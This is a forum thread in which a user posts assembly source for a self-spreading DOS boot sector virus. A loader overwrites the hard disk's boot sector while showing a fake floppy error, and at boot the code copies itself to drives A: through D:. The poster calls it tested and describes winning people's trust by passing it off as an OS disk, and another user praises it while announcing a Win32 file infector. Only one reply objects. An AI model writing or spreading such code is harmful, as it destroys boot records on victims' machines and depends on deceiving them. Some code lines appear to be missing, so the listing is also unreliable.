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Index > DOS > Boot sector virus - it finally works.

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Joined: 03 Apr 2011
Posts: 12092
mbr_tsr 21 May 2015, 03:05
;The Wow.C4 Virus Version 2.0
;Note: Requires int 13h
;Assemble with FASM
;* .Com file copies 512 byte virus to C:\ boot sector
;* Boot to C:\ writes virus to A: B: C: and D:
;Fully tested. A little slow.
;Acts a little weird waiting for  key, little slow.

;.Com file loader

Org 0x0100

push cs
push cs
pop  ds
pop  es

mov ah, 3     ;write
mov al, 1     ;# of sectors
mov ch, 0     ;Cylinder
mov cl, 1     ;Start Sector
mov dh, 0     ;Head
mov dl, 80h   ;drive#
mov bx, Start ;Buff
int 13h       ;disk

push cs
pop  ds

;fake message
mov si, FirstMsg
call ShowStrCom

mov ah, 0
int 0x16

mov ah, 0x4C
int 0x21

cmp  al, 0   
je   OkayBaby
mov  ah, 0x0E
mov  bh, 0x00
int  0x10    
jmp  ShowStrCom
FirstMsg db "Cannot read from floppy A: or USB.",13,10,7,0
;Boot Sector

Org 0x7C00

push cs
push cs
pop  ds
pop  es

mov byte [cs:DriveNumber], 0
call WriteSectorBoot
mov byte [cs:DriveNumber], 1
call WriteSectorBoot
mov byte [cs:DriveNumber], 80h
call WriteSectorBoot
mov byte [cs:DriveNumber], 81h
call WriteSectorBoot

push cs
pop  ds
mov  si, Stoned
call ShowStr

mov ah, 0
int 0x16

jmp Main
cmp  al, 0   
je   Okay
mov  ah, 0x0E
mov  bh, 0x00
int  0x10    
jmp  ShowStr
mov  cx, 5 ;retries
push cx
push cs
pop  es
mov ah, 3     ;write
mov al, 1     ;# of sectors
mov ch, 0     ;Cylinder
mov cl, 1     ;Start Sector
mov dh, 0     ;Head
mov dl, byte [cs:DriveNumber]
mov bx, Main  ;Buff
int 13h       ;disk
pop cx
jnc WereOut
loop Looper
DriveNumber db 0

Stoned db "Your PC is Now Stoned!!!",13,10
       db "Insert Disk I Can Write to...",13,10,7,0

      rb Main+512-2-$ 
      dw 0xAA55

Edit by revolution: Added code tags
Post 21 May 2015, 03:05
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Joined: 14 Jul 2014
Posts: 42
Location: Somewhere over the rainbow...
Foxxy 21 May 2015, 18:21
Stoned 2.0? Great work, I'm working on a file infector for Win32 myself. Smile
Post 21 May 2015, 18:21
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Joined: 14 Jul 2014
Posts: 42
Location: Somewhere over the rainbow...
Foxxy 21 May 2015, 18:21
Stoned 2.0? Great work, I'm working on a file infector for Win32 myself. Smile
Post 21 May 2015, 18:21
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Joined: 03 Apr 2011
Posts: 12092
mbr_tsr 27 May 2015, 21:38
WOW, UR, this one is NICE, for some reason occasionally i have to hit a key to display the message, and sometimes it takes 20 seconds to show the message, the first bug i encountered was int 13h needed a retry, using function 3 only once never worked, and plus gaining my peoples trust it is a good OS disk.
Post 27 May 2015, 21:38
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Joined: 22 Nov 2012
Posts: 161
Fixit 28 May 2015, 01:36
Have you considered doing something to help people instead of harming them ?
Post 28 May 2015, 01:36
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